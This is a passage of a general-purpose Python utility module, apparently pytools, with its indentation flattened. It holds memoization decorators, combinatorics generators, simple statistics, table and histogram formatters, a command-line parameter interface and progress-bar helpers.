raise ValueError("empty iterable passed to 'single_valued()'")
def others_same():
for other_item in it:
if not equality_pred(other_item, first_item):
return False
return True
assert others_same()
return first_item
# }}}
# {{{ memoization / attribute storage
def memoize(*args: F, **kwargs: Any) -> F:
"""Stores previously computed function values in a cache.
Two keyword-only arguments are supported:
:arg use_kwargs: Allows the caller to use keyword arguments. Defaults to
``False``. Setting this to ``True`` has a non-negligible performance
impact.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
"""
use_kw = bool(kwargs.pop("use_kwargs", False))
default_key_func: Optional[Callable[..., Any]]
if use_kw:
def default_key_func(*inner_args, **inner_kwargs): # noqa pylint:disable=function-redefined
return inner_args, frozenset(inner_kwargs.items())
else:
default_key_func = None
key_func = kwargs.pop("key", default_key_func)
if kwargs:
raise TypeError(
"memoize received unexpected keyword arguments: %s"
% ", ".join(list(kwargs.keys())))
if key_func is not None:
@my_decorator
def _deco(func, *args, **kwargs):
# by Michele Simionato
# http://www.phyast.pitt.edu/~micheles/python/
key = key_func(*args, **kwargs)
try:
return func._memoize_dic[key] # pylint: disable=protected-access
except AttributeError:
# _memoize_dic doesn't exist yet.
result = func(*args, **kwargs)
func._memoize_dic = {key: result} # pylint: disable=protected-access
return result
except KeyError:
result = func(*args, **kwargs)
func._memoize_dic[key] = result # pylint: disable=protected-access
return result
else:
@my_decorator
def _deco(func, *args):
# by Michele Simionato
# http://www.phyast.pitt.edu/~micheles/python/
try:
return func._memoize_dic[args] # pylint: disable=protected-access
except AttributeError:
# _memoize_dic doesn't exist yet.
result = func(*args)
func._memoize_dic = {args: result} # pylint:disable=protected-access
return result
except KeyError:
result = func(*args)
func._memoize_dic[args] = result # pylint: disable=protected-access
return result
if not args:
return _deco
if callable(args[0]) and len(args) == 1:
return _deco(args[0])
raise TypeError(
"memoize received unexpected position arguments: %s" % args)
FunctionValueCache = memoize
class _HasKwargs:
pass
def memoize_on_first_arg(function, cache_dict_name=None):
"""Like :func:`memoize_method`, but for functions that take the object
in which do memoization information is stored as first argument.
Supports cache deletion via ``function_name.clear_cache(self)``.
"""
if cache_dict_name is None:
cache_dict_name = intern("_memoize_dic_"
+ function.__module__ + function.__name__)
def wrapper(obj, *args, **kwargs):
if kwargs:
key = (_HasKwargs, frozenset(kwargs.items())) + args
else:
key = args
try:
return getattr(obj, cache_dict_name)[key]
except AttributeError:
result = function(obj, *args, **kwargs)
setattr(obj, cache_dict_name, {key: result})
return result
except KeyError:
result = function(obj, *args, **kwargs)
getattr(obj, cache_dict_name)[key] = result
return result
def clear_cache(obj):
delattr(obj, cache_dict_name)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, function)
new_wrapper.clear_cache = clear_cache
return new_wrapper
def memoize_method(method: F) -> F:
"""Supports cache deletion via ``method_name.clear_cache(self)``.
"""
return memoize_on_first_arg(method, intern("_memoize_dic_"+method.__name__))
class keyed_memoize_on_first_arg: # noqa: N801
"""Like :func:`memoize_method`, but for functions that take the object
in which memoization information is stored as first argument.
Supports cache deletion via ``function_name.clear_cache(self)``.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
.. versionadded :: 2020.3
"""
def __init__(self, key, cache_dict_name=None):
self.key = key
self.cache_dict_name = cache_dict_name
def _default_cache_dict_name(self, function):
return intern("_memoize_dic_"
+ function.__module__ + function.__name__)
def __call__(self, function):
cache_dict_name = self.cache_dict_name
key = self.key
if cache_dict_name is None:
cache_dict_name = self._default_cache_dict_name(function)
def wrapper(obj, *args, **kwargs):
cache_key = key(*args, **kwargs)
try:
return getattr(obj, cache_dict_name)[cache_key]
except AttributeError:
result = function(obj, *args, **kwargs)
setattr(obj, cache_dict_name, {cache_key: result})
return result
except KeyError:
result = function(obj, *args, **kwargs)
getattr(obj, cache_dict_name)[cache_key] = result
return result
def clear_cache(obj):
delattr(obj, cache_dict_name)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, function)
new_wrapper.clear_cache = clear_cache
return new_wrapper
class keyed_memoize_method(keyed_memoize_on_first_arg): # noqa: N801
"""Supports cache deletion via ``method_name.clear_cache(self)``.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
.. versionadded :: 2020.3
"""
def _default_cache_dict_name(self, function):
return intern("_memoize_dic_" + function.__name__)
def memoize_method_with_uncached(uncached_args=None, uncached_kwargs=None):
"""Supports cache deletion via ``method_name.clear_cache(self)``.
:arg uncached_args: a list of argument numbers
(0-based, not counting 'self' argument)
"""
from warnings import warn
warn("memoize_method_with_uncached is deprecated and will go away in 2022. "
"Use memoize_method_with_key instead",
DeprecationWarning,
stacklevel=2)
if uncached_args is None:
uncached_args = []
if uncached_kwargs is None:
uncached_kwargs = set()
# delete starting from the end
uncached_args = sorted(uncached_args, reverse=True)
uncached_kwargs = list(uncached_kwargs)
def parametrized_decorator(method):
cache_dict_name = intern("_memoize_dic_"+method.__name__)
def wrapper(self, *args, **kwargs):
cache_args = list(args)
cache_kwargs = kwargs.copy()
for i in uncached_args:
if i < len(cache_args):
cache_args.pop(i)
cache_args = tuple(cache_args)
if kwargs:
for name in uncached_kwargs:
cache_kwargs.pop(name, None)
key = (
(_HasKwargs, frozenset(cache_kwargs.items()))
+ cache_args)
else:
key = cache_args
try:
return getattr(self, cache_dict_name)[key]
except AttributeError:
result = method(self, *args, **kwargs)
setattr(self, cache_dict_name, {key: result})
return result
except KeyError:
result = method(self, *args, **kwargs)
getattr(self, cache_dict_name)[key] = result
return result
def clear_cache(self):
delattr(self, cache_dict_name)
if sys.version_info >= (2, 5):
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, method)
new_wrapper.clear_cache = clear_cache
return new_wrapper
return parametrized_decorator
def memoize_method_nested(inner):
"""Adds a cache to a function nested inside a method. The cache is attached
to *memoize_cache_context* (if it exists) or *self* in the outer (method)
namespace.
Requires Python 2.5 or newer.
"""
from warnings import warn
warn("memoize_method_nested is deprecated and will go away in 2021. "
"Use @memoize_in(self, 'identifier') instead", DeprecationWarning,
stacklevel=2)
cache_dict_name = intern("_memoize_inner_dic_%s_%s_%d"
% (inner.__name__, inner.__code__.co_filename,
inner.__code__.co_firstlineno))
from inspect import currentframe
outer_frame = currentframe().f_back
cache_context = outer_frame.f_locals.get("memoize_cache_context")
if cache_context is None:
cache_context = outer_frame.f_locals.get("self")
try:
cache_dict = getattr(cache_context, cache_dict_name)
except AttributeError:
cache_dict = {}
setattr(cache_context, cache_dict_name, cache_dict)
@wraps(inner)
def new_inner(*args):
try:
return cache_dict[args]
except KeyError:
result = inner(*args)
cache_dict[args] = result
return result
return new_inner
class memoize_in: # noqa
"""Adds a cache to a function nested inside a method. The cache is attached
to *container*.
.. versionchanged :: 2020.3
*identifier* no longer needs to be a :class:`str`,
but it needs to be hashable.
"""
def __init__(self, container, identifier):
try:
memoize_in_dict = container._pytools_memoize_in_dict
except AttributeError:
memoize_in_dict = {}
container._pytools_memoize_in_dict = memoize_in_dict
self.cache_dict = memoize_in_dict.setdefault(identifier, {})
def __call__(self, inner):
@wraps(inner)
def new_inner(*args):
try:
return self.cache_dict[args]
except KeyError:
result = inner(*args)
self.cache_dict[args] = result
return result
return new_inner
# }}}
# {{{ syntactical sugar
class InfixOperator:
"""Pseudo-infix operators that allow syntax of the kind `op1 <<operator>> op2'.
Following a recipe from
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/384122
"""
def __init__(self, function):
self.function = function
def __rlshift__(self, other):
return InfixOperator(lambda x: self.function(other, x))
def __rshift__(self, other):
return self.function(other)
def call(self, a, b):
return self.function(a, b)
def monkeypatch_method(cls):
# from GvR, http://mail.python.org/pipermail/python-dev/2008-January/076194.html
def decorator(func):
setattr(cls, func.__name__, func)
return func
return decorator
def monkeypatch_class(_name, bases, namespace):
# from GvR, http://mail.python.org/pipermail/python-dev/2008-January/076194.html
assert len(bases) == 1, "Exactly one base class required"
base = bases[0]
for name, value in namespace.items():
if name != "__metaclass__":
setattr(base, name, value)
return base
# }}}
# {{{ generic utilities
def add_tuples(t1, t2):
return tuple([t1v + t2v for t1v, t2v in zip(t1, t2)])
def negate_tuple(t1):
return tuple([-t1v for t1v in t1])
def shift(vec, dist):
"""Return a copy of C{vec} shifted by C{dist}.
@postcondition: C{shift(a, i)[j] == a[(i+j) % len(a)]}
"""
result = vec[:]
N = len(vec) # noqa
dist = dist % N
# modulo only returns positive distances!
if dist > 0:
result[dist:] = vec[:N-dist]
result[:dist] = vec[N-dist:]
return result
def len_iterable(iterable):
return sum(1 for i in iterable)
def flatten(iterable):
"""For an iterable of sub-iterables, generate each member of each
sub-iterable in turn, i.e. a flattened version of that super-iterable.
Example: Turn [[a,b,c],[d,e,f]] into [a,b,c,d,e,f].
"""
for sublist in iterable:
yield from sublist
def general_sum(sequence):
return reduce(operator.add, sequence)
def linear_combination(coefficients, vectors):
result = coefficients[0] * vectors[0]
for c, v in zip(coefficients[1:], vectors[1:]):
result += c*v
return result
def common_prefix(iterable, empty=None):
it = iter(iterable)
try:
pfx = next(it)
except StopIteration:
return empty
for v in it:
for j, pfx_j in enumerate(pfx):
if pfx_j != v[j]:
pfx = pfx[:j]
if j == 0:
return pfx
break
return pfx
def decorate(function, iterable):
return [(x, function(x)) for x in iterable]
def partition(criterion, iterable):
part_true = []
part_false = []
for i in iterable:
if criterion(i):
part_true.append(i)
else:
part_false.append(i)
return part_true, part_false
def partition2(iterable):
part_true = []
part_false = []
for pred, i in iterable:
if pred:
part_true.append(i)
else:
part_false.append(i)
return part_true, part_false
def product(iterable: Iterable[Any]) -> Any:
from operator import mul
return reduce(mul, iterable, 1)
def reverse_dictionary(the_dict):
result = {}
for key, value in the_dict.items():
if value in result:
raise RuntimeError(
"non-reversible mapping, duplicate key '%s'" % value)
result[value] = key
return result
def set_sum(set_iterable):
from operator import or_
return reduce(or_, set_iterable, set())
def div_ceil(nr, dr):
return -(-nr // dr)
def uniform_interval_splitting(n, granularity, max_intervals):
""" Return *(interval_size, num_intervals)* such that::
num_intervals * interval_size >= n
and::
(num_intervals - 1) * interval_size < n
and *interval_size* is a multiple of *granularity*.
"""
# ported from Thrust
grains = div_ceil(n, granularity)
# one grain per interval
if grains <= max_intervals:
return granularity, grains
grains_per_interval = div_ceil(grains, max_intervals)
interval_size = grains_per_interval * granularity
num_intervals = div_ceil(n, interval_size)
return interval_size, num_intervals
def find_max_where(predicate, prec=1e-5, initial_guess=1, fail_bound=1e38):
"""Find the largest value for which a predicate is true,
along a half-line. 0 is assumed to be the lower bound."""
# {{{ establish bracket
mag = initial_guess
if predicate(mag):
mag *= 2
while predicate(mag):
mag *= 2
if mag > fail_bound:
raise RuntimeError("predicate appears to be true "
"everywhere, up to %g" % fail_bound)
lower_true = mag/2
upper_false = mag
else:
mag /= 2
while not predicate(mag):
mag /= 2
if mag < prec:
return mag
lower_true = mag
upper_false = mag*2
# }}}
# {{{ refine
# Refine a bracket between *lower_true*, where the predicate is true,
# and *upper_false*, where it is false, until *prec* is satisfied.
assert predicate(lower_true)
assert not predicate(upper_false)
while abs(lower_true-upper_false) > prec:
mid = (lower_true+upper_false)/2
if predicate(mid):
lower_true = mid
else:
upper_false = mid
return lower_true
# }}}
# }}}
# {{{ argmin, argmax
def argmin2(iterable, return_value=False):
it = iter(iterable)
try:
current_argmin, current_min = next(it)
except StopIteration:
raise ValueError("argmin of empty iterable")
for arg, item in it:
if item < current_min:
current_argmin = arg
current_min = item
if return_value:
return current_argmin, current_min
else:
return current_argmin
def argmax2(iterable, return_value=False):
it = iter(iterable)
try:
current_argmax, current_max = next(it)
except StopIteration:
raise ValueError("argmax of empty iterable")
for arg, item in it:
if item > current_max:
current_argmax = arg
current_max = item
if return_value:
return current_argmax, current_max
else:
return current_argmax
def argmin(iterable):
return argmin2(enumerate(iterable))
def argmax(iterable):
return argmax2(enumerate(iterable))
# }}}
# {{{ cartesian products etc.
def cartesian_product(*args):
if len(args) == 1:
for arg in args[0]:
yield (arg,)
return
first = args[:-1]
for prod in cartesian_product(*first):
for i in args[-1]:
yield prod + (i,)
def distinct_pairs(list1, list2):
for i, xi in enumerate(list1):
for j, yj in enumerate(list2):
if i != j:
yield (xi, yj)
def cartesian_product_sum(list1, list2):
"""This routine returns a list of sums of each element of
list1 with each element of list2. Also works with lists.
"""
for i in list1:
for j in list2:
yield i+j
# }}}
# {{{ elementary statistics
def average(iterable):
"""Return the average of the values in iterable.
iterable may not be empty.
"""
it = iterable.__iter__()
try:
s = next(it)
count = 1
except StopIteration:
raise ValueError("empty average")
for value in it:
s = s + value
count += 1
return s/count
class VarianceAggregator:
"""Online variance calculator.
See http://en.wikipedia.org/wiki/Algorithms_for_calculating_variance
Adheres to pysqlite's aggregate interface.
"""
def __init__(self, entire_pop):
self.n = 0
self.mean = 0
self.m2 = 0
self.entire_pop = entire_pop
def step(self, x):
self.n += 1
delta_ = x - self.mean
self.mean += delta_/self.n
self.m2 += delta_*(x - self.mean)
def finalize(self):
if self.entire_pop:
if self.n == 0:
return None
else:
return self.m2/self.n
else:
if self.n <= 1:
return None
else:
return self.m2/(self.n - 1)
def variance(iterable, entire_pop):
v_comp = VarianceAggregator(entire_pop)
for x in iterable:
v_comp.step(x)
return v_comp.finalize()
def std_deviation(iterable, finite_pop):
from math import sqrt
return sqrt(variance(iterable, finite_pop))
# }}}
# {{{ permutations, tuples, integer sequences
def wandering_element(length, wanderer=1, landscape=0):
for i in range(length):
yield i*(landscape,) + (wanderer,) + (length-1-i)*(landscape,)
def indices_in_shape(shape):
from warnings import warn
warn("indices_in_shape is deprecated. You should prefer numpy.ndindex.",
DeprecationWarning, stacklevel=2)
if isinstance(shape, int):
shape = (shape,)
if not shape:
yield ()
elif len(shape) == 1:
for i in range(0, shape[0]):
yield (i,)
else:
remainder = shape[1:]
for i in range(0, shape[0]):
for rest in indices_in_shape(remainder):
yield (i,)+rest
def generate_nonnegative_integer_tuples_below(n, length=None, least=0):
"""n may be a sequence, in which case length must be None."""
if length is None:
if not n:
yield ()
return
my_n = n[0]
n = n[1:]
next_length = None
else:
my_n = n
assert length >= 0
if length == 0:
yield ()
return
next_length = length-1
for i in range(least, my_n):
my_part = (i,)
for base in generate_nonnegative_integer_tuples_below(n, next_length, least):
yield my_part + base
def generate_decreasing_nonnegative_tuples_summing_to(
n, length, min_value=0, max_value=None):
if length == 0:
yield ()
elif length == 1:
if n <= max_value:
#print "MX", n, max_value
yield (n,)
else:
return
else:
if max_value is None or n < max_value:
max_value = n
for i in range(min_value, max_value+1):
#print "SIG", sig, i
for remainder in generate_decreasing_nonnegative_tuples_summing_to(
n-i, length-1, min_value, i):
yield (i,) + remainder
def generate_nonnegative_integer_tuples_summing_to_at_most(n, length):
"""Enumerate all non-negative integer tuples summing to at most n,
exhausting the search space by varying the first entry fastest,
and the last entry the slowest.
"""
assert length >= 0
if length == 0:
yield ()
else:
for i in range(n+1):
for remainder in generate_nonnegative_integer_tuples_summing_to_at_most(
n-i, length-1):
yield remainder + (i,)
def generate_all_nonnegative_integer_tuples(length, least=0):
assert length >= 0
current_max = least
while True:
for max_pos in range(length):
for prebase in generate_nonnegative_integer_tuples_below(
current_max, max_pos, least):
for postbase in generate_nonnegative_integer_tuples_below(
current_max+1, length-max_pos-1, least):
yield prebase + [current_max] + postbase
current_max += 1
# backwards compatibility
generate_positive_integer_tuples_below = generate_nonnegative_integer_tuples_below
generate_all_positive_integer_tuples = generate_all_nonnegative_integer_tuples
def _pos_and_neg_adaptor(tuple_iter):
for tup in tuple_iter:
nonzero_indices = [i for i in range(len(tup)) if tup[i] != 0]
for do_neg_tup in generate_nonnegative_integer_tuples_below(
2, len(nonzero_indices)):
this_result = list(tup)
for index, do_neg in enumerate(do_neg_tup):
if do_neg:
this_result[nonzero_indices[index]] *= -1
yield tuple(this_result)
def generate_all_integer_tuples_below(n, length, least_abs=0):
return _pos_and_neg_adaptor(generate_nonnegative_integer_tuples_below(
n, length, least_abs))
def generate_all_integer_tuples(length, least_abs=0):
return _pos_and_neg_adaptor(generate_all_nonnegative_integer_tuples(
length, least_abs))
def generate_permutations(original):
"""Generate all permutations of the list *original*.
Nicked from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/252178
"""
if len(original) <= 1:
yield original
else:
for perm_ in generate_permutations(original[1:]):
for i in range(len(perm_)+1):
#nb str[0:1] works in both string and list contexts
yield perm_[:i] + original[0:1] + perm_[i:]
def generate_unique_permutations(original):
"""Generate all unique permutations of the list *original*.
"""
had_those = set()
for perm_ in generate_permutations(original):
if perm_ not in had_those:
had_those.add(perm_)
yield perm_
def enumerate_basic_directions(dimensions):
coordinate_list = [[0], [1], [-1]]
return reduce(cartesian_product_sum, [coordinate_list] * dimensions)[1:]
# }}}
# {{{ index mangling
def get_read_from_map_from_permutation(original, permuted):
"""With a permutation given by *original* and *permuted*,
generate a list *rfm* of indices such that
``permuted[i] == original[rfm[i]]``.
Requires that the permutation can be inferred from
*original* and *permuted*.
.. doctest ::
>>> for p1 in generate_permutations(list(range(5))):
... for p2 in generate_permutations(list(range(5))):
... rfm = get_read_from_map_from_permutation(p1, p2)
... p2a = [p1[rfm[i]] for i in range(len(p1))]
... assert p2 == p2a
"""
from warnings import warn
warn("get_read_from_map_from_permutation is deprecated and will be "
"removed in 2019", DeprecationWarning, stacklevel=2)
assert len(original) == len(permuted)
where_in_original = {
original[i]: i for i in range(len(original))}
assert len(where_in_original) == len(original)
return tuple(where_in_original[pi] for pi in permuted)
def get_write_to_map_from_permutation(original, permuted):
"""With a permutation given by *original* and *permuted*,
generate a list *wtm* of indices such that
``permuted[wtm[i]] == original[i]``.
Requires that the permutation can be inferred from
*original* and *permuted*.
.. doctest ::
>>> for p1 in generate_permutations(list(range(5))):
... for p2 in generate_permutations(list(range(5))):
... wtm = get_write_to_map_from_permutation(p1, p2)
... p2a = [0] * len(p2)
... for i, oi in enumerate(p1):
... p2a[wtm[i]] = oi
... assert p2 == p2a
"""
from warnings import warn
warn("get_write_to_map_from_permutation is deprecated and will be "
"removed in 2019", DeprecationWarning, stacklevel=2)
assert len(original) == len(permuted)
where_in_permuted = {
permuted[i]: i for i in range(len(permuted))}
assert len(where_in_permuted) == len(permuted)
return tuple(where_in_permuted[oi] for oi in original)
# }}}
# {{{ graph algorithms
from pytools.graph import a_star as a_star_moved
a_star = MovedFunctionDeprecationWrapper(a_star_moved)
# }}}
# {{{ formatting
# {{{ table formatting
class Table:
"""An ASCII table generator.
:arg alignments: List of alignments of each column ('l', 'c', or 'r',
for left, center, and right alignment, respectively). Columns which
have no alignment specifier will use the last specified alignment. For
example, with `alignments=['l', 'r']`, the third and all following
columns will use 'r' alignment.
.. automethod:: add_row
.. automethod:: __str__
.. automethod:: latex
.. automethod:: github_markdown
"""
def __init__(self, alignments=None):
self.rows = []
if alignments is not None:
self.alignments = alignments
else:
self.alignments = ["l"]
def add_row(self, row):
self.rows.append([str(i) for i in row])
def __str__(self):
"""
Returns a string representation of the table.
.. doctest ::
>>> tbl = Table(alignments=['l', 'r', 'l'])
>>> tbl.add_row([1, '|'])
>>> tbl.add_row([10, '20||'])
>>> print(tbl)
1 | |
---+------
10 | 20||
"""
columns = len(self.rows[0])
col_widths = [max(len(row[i]) for row in self.rows)
for i in range(columns)]
alignments = self.alignments
# If not all alignments were specified, extend alignments with the
# last alignment specified:
alignments += self.alignments[-1] * (columns - len(self.alignments))
lines = [" | ".join([
cell.center(col_width) if align == "c"
else cell.ljust(col_width) if align == "l"
else cell.rjust(col_width)
for cell, col_width, align in zip(row, col_widths, alignments)])
for row in self.rows]
lines[1:1] = ["+".join("-" * (col_width + 1 + (i > 0))
for i, col_width in enumerate(col_widths))]
return "\n".join(lines)
def github_markdown(self):
r"""Returns a string representation of the table formatted as
`GitHub-Flavored Markdown.
<https://docs.github.com/en/github/writing-on-github/organizing-information-with-tables>`__
.. doctest ::
>>> tbl = Table(alignments=['l', 'r', 'l'])
>>> tbl.add_row([1, '|'])
>>> tbl.add_row([10, '20||'])
>>> print(tbl.github_markdown())
1 | \|
:--|-------:
10 | 20\|\|
""" # noqa: W605
# Pipe symbols ('|') must be replaced
rows = [[w.replace("|", "\\|") for w in r] for r in self.rows]
columns = len(rows[0])
col_widths = [max(len(row[i]) for row in rows)
for i in range(columns)]
alignments = self.alignments
# If not all alignments were specified, extend alignments with the
# last alignment specified:
alignments += self.alignments[-1] * (columns - len(self.alignments))
lines = [" | ".join([
cell.center(col_width) if align == "c"
else cell.ljust(col_width) if align == "l"
else cell.rjust(col_width)
for cell, col_width, align in zip(row, col_widths, alignments)])
for row in rows]
lines[1:1] = ["|".join(
":" + "-" * (col_width - 1 + (i > 0)) + ":" if align == "c"
else ":" + "-" * (col_width + (i > 0)) if align == "l"
else "-" * (col_width + (i > 0)) + ":"
for i, (col_width, align) in enumerate(zip(col_widths, alignments)))]
return "\n".join(lines)
def csv(self, dialect="excel", csv_kwargs=None):
"""Returns a string containing a CSV representation of the table.
:arg dialect: String passed to :func:`csv.writer`.
:arg csv_kwargs: Dict of arguments passed to :func:`csv.writer`.
.. doctest ::
>>> tbl = Table()
>>> tbl.add_row([1, ","])
>>> tbl.add_row([10, 20])
>>> print(tbl.csv())
1,","
10,20
"""
import csv
import io
if csv_kwargs is None:
csv_kwargs = {}
# Default is "\r\n"
if "lineterminator" not in csv_kwargs:
csv_kwargs["lineterminator"] = "\n"
output = io.StringIO()
writer = csv.writer(output, dialect, **csv_kwargs)
writer.writerows(self.rows)
return output.getvalue().rstrip(csv_kwargs["lineterminator"])
def latex(self, skip_lines=0, hline_after=None):
if hline_after is None:
hline_after = []
lines = []
for row_nr, row in list(enumerate(self.rows))[skip_lines:]:
lines.append(" & ".join(row)+r" \\")
if row_nr in hline_after:
lines.append(r"\hline")
return "\n".join(lines)
# }}}
# {{{ histogram formatting
def string_histogram( # pylint: disable=too-many-arguments,too-many-locals
iterable, min_value=None, max_value=None,
bin_count=20, width=70, bin_starts=None, use_unicode=True):
if bin_starts is None:
if min_value is None or max_value is None:
iterable = list(iterable)
min_value = min(iterable)
max_value = max(iterable)
bin_width = (max_value - min_value)/bin_count
bin_starts = [min_value+bin_width*i for i in range(bin_count)]
bins = [0 for i in range(len(bin_starts))]
from bisect import bisect
for value in iterable:
if max_value is not None and value > max_value or value < bin_starts[0]:
from warnings import warn
warn("string_histogram: out-of-bounds value ignored")
else:
bin_nr = bisect(bin_starts, value)-1
try:
bins[bin_nr] += 1
except Exception:
print(value, bin_nr, bin_starts)
raise
from math import floor, ceil
if use_unicode:
def format_bar(cnt):
scaled = cnt*width/max_count
full = int(floor(scaled))
eighths = int(ceil((scaled-full)*8))
if eighths:
return full*chr(0x2588) + chr(0x2588+(8-eighths))
else:
return full*chr(0x2588)
else:
def format_bar(cnt):
return int(ceil(cnt*width/max_count))*"#"
max_count = max(bins)
total_count = sum(bins)
return "\n".join("%9g |%9d | %3.0f %% | %s" % (
bin_start,
bin_value,
bin_value/total_count*100,
format_bar(bin_value))
for bin_start, bin_value in zip(bin_starts, bins))
# }}}
def word_wrap(text, width, wrap_using="\n"):
# http://code.activestate.com/recipes/148061-one-liner-word-wrap-function/
r"""
A word-wrap function that preserves existing line breaks
and most spaces in the text. Expects that existing line
breaks are posix newlines (``\n``).
"""
space_or_break = [" ", wrap_using]
return reduce(lambda line, word: "%s%s%s" %
(line,
space_or_break[(len(line)-line.rfind("\n")-1
+ len(word.split("\n", 1)[0])
>= width)],
word),
text.split(" ")
)
# }}}
# {{{ command line interfaces -------------------------------------------------
def _exec_arg(arg, execenv):
import os
if os.access(arg, os.F_OK):
exec(compile(open(arg), arg, "exec"), execenv)
else:
exec(compile(arg, "<command line>", "exec"), execenv)
class CPyUserInterface:
class Parameters(Record):
pass
def __init__(self, variables, constants=None, doc=None):
if constants is None:
constants = {}
if doc is None:
doc = {}
self.variables = variables
self.constants = constants
self.doc = doc
def show_usage(self, progname):
print("usage: %s <FILE-OR-STATEMENTS>" % progname)
print()
print("FILE-OR-STATEMENTS may either be Python statements of the form")
print("'variable1 = value1; variable2 = value2' or the name of a file")
print("containing such statements. Any valid Python code may be used")
print("on the command line or in a command file. If new variables are")
print("used, they must start with 'user_' or just '_'.")
print()
print("The following variables are recognized:")
for v in sorted(self.variables):
print(" {} = {}".format(v, self.variables[v]))
if v in self.doc:
print(" %s" % self.doc[v])
print()
print("The following constants are supplied:")
for c in sorted(self.constants):
print(" {} = {}".format(c, self.constants[c]))
if c in self.doc:
print(" %s" % self.doc[c])
def gather(self, argv=None):
if argv is None:
argv = sys.argv
if len(argv) == 1 or (
("-h" in argv)
or ("help" in argv)
or ("-help" in argv)
or ("--help" in argv)):
self.show_usage(argv[0])
sys.exit(2)
execenv = self.variables.copy()
execenv.update(self.constants)
for arg in argv[1:]:
_exec_arg(arg, execenv)
# check if the user set invalid keys
for added_key in (
set(execenv.keys())
- set(self.variables.keys())
- set(self.constants.keys())):
if not (added_key.startswith("user_") or added_key.startswith("_")):
raise ValueError(
"invalid setup key: '%s' "
"(user variables must start with 'user_' or '_')"
% added_key)
result = self.Parameters({key: execenv[key] for key in self.variables})
self.validate(result)
return result
def validate(self, setup):
pass
# }}}
# {{{ debugging
class StderrToStdout:
def __enter__(self):
# pylint: disable=attribute-defined-outside-init
self.stderr_backup = sys.stderr
sys.stderr = sys.stdout
def __exit__(self, exc_type, exc_val, exc_tb):
sys.stderr = self.stderr_backup
del self.stderr_backup
def typedump(val, max_seq=5, special_handlers=None):
if special_handlers is None:
special_handlers = {}
try:
hdlr = special_handlers[type(val)]
except KeyError:
pass
else:
return hdlr(val)
try:
len(val)
except TypeError:
return type(val).__name__
else:
if isinstance(val, dict):
return "{%s}" % (
", ".join(
"{!r}: {}".format(str(k), typedump(v))
for k, v in val.items()))
try:
if len(val) > max_seq:
return "{}({},...)".format(
type(val).__name__,
",".join(typedump(x, max_seq, special_handlers)
for x in val[:max_seq]))
else:
return "{}({})".format(
type(val).__name__,
",".join(typedump(x, max_seq, special_handlers)
for x in val))
except TypeError:
return val.__class__.__name__
def invoke_editor(s, filename="edit.txt", descr="the file"):
from tempfile import mkdtemp
tempdir = mkdtemp()
from os.path import join
full_name = join(tempdir, filename)
outf = open(full_name, "w")
outf.write(str(s))
outf.close()
import os
if "EDITOR" in os.environ:
from subprocess import Popen
p = Popen([os.environ["EDITOR"], full_name])
os.waitpid(p.pid, 0)
else:
print("(Set the EDITOR environment variable to be "
"dropped directly into an editor next time.)")
input("Edit %s at %s now, then hit [Enter]:"
% (descr, full_name))
inf = open(full_name)
result = inf.read()
inf.close()
return result
# }}}
# {{{ progress bars
class ProgressBar: # pylint: disable=too-many-instance-attributes
"""
.. automethod:: draw
.. automethod:: progress
.. automethod:: set_progress
.. automethod:: finished
.. automethod:: __enter__
.. automethod:: __exit__
"""
def __init__(self, descr, total, initial=0, length=40):
import time
self.description = descr
self.total = total
self.done = initial
self.length = length
self.last_squares = -1
self.start_time = time.time()
self.last_update_time = self.start_time
self.speed_meas_start_time = self.start_time
self.speed_meas_start_done = initial
self.time_per_step = None
def draw(self):
import time
now = time.time()
squares = int(self.done/self.total*self.length)
if squares != self.last_squares or now-self.last_update_time > 0.5:
if (self.done != self.speed_meas_start_done
and now-self.speed_meas_start_time > 3):
new_time_per_step = (now-self.speed_meas_start_time) \
/ (self.done-self.speed_meas_start_done)
if self.time_per_step is not None:
self.time_per_step = (new_time_per_step + self.time_per_step)/2
else:
self.time_per_step = new_time_per_step
self.speed_meas_start_time = now
self.speed_meas_start_done = self.done
if self.time_per_step is not None:
eta_str = "%7.1fs " % max(
0, (self.total-self.done) * self.time_per_step)
else:
eta_str = "?"
sys.stderr.write("{:<20} [{}] ETA {}\r".format(
self.description,
squares*"#"+(self.length-squares)*" ",
eta_str))
self.last_squares = squares
self.last_update_time = now
def progress(self, steps=1):
self.set_progress(self.done + steps)
def set_progress(self, done):
self.done = done
self.draw()
def finished(self):
self.set_progress(self.total)
sys.stderr.write("\n")
def __enter__(self):
self.draw()
def __exit__(self, exc_type, exc_val, exc_tb):
self.finished()
# }}}
# {{{ file system related
def assert_not_a_file(name):
import os
if os.access(name, os.F_OK):
raise OSError("file `%s' already exists" % name)
def add_python_path_relative_to_script(rel_path):
from os.path import dirname, join, abspath
script_name = sys.argv[0]
rel_script_dir = dirname(script_name)
sys.path.append(abspath(join(rel_script_dir, rel_path)))
# }}}
# {{{ numpy dtype mangling
def common_dtype(dtypes, default=None):
dtypes = list(dtypes)
if dtypes:
return argmax2((dtype, dtype.num) for dtype in dtypes)
else:
if default is not None:
return default
else:
raise ValueError(
"cannot find common dtype of empty dtype list")
def to_uncomplex_dtype(dtype):
import numpy
if dtype == numpy.complex64:
return numpy.float32
elif dtype == numpy.complex128:
return numpy.float64
if dtype == numpy.float32:
return numpy.float32
elif dtype == numpy.float64:
return numpy.float64
else:
raise TypeError("unrecgonized dtype '%s'" % dtype)
def match_precision(dtype, dtype_to_match):
import numpy
tgt_is_double = dtype_to_match in [
numpy.float64, numpy.complex128]
dtype_is_complex = dtype.kind == "c"
if dtype_is_complex:
if tgt_is_double:
return numpy.dtype(numpy.complex128)
else:
return numpy.dtype(numpy.complex64)
else:
if tgt_is_double:
return numpy.dtype(numpy.float64)
else:
return numpy.dtype(numpy.float32)
# }}}
# {{{ unique name generation
def generate_unique_names(prefix):
yield prefix
try_num = 0
while True:
yield "%s_%d" % (prefix, try_num)
try_num += 1
def generate_numbered_unique_names(
prefix: str, num: Optional[int] = None) -> Iterable[Tuple[int, str]]:
if num is None:
yield (0, prefix)
num = 0
while True:
name = "%s_%d" % (prefix, num)
num += 1
yield (num, name)
generate_unique_possibilities = MovedFunctionDeprecationWrapper(
generate_unique_names)
class UniqueNameGenerator:
"""
.. automethod:: is_name_conflicting
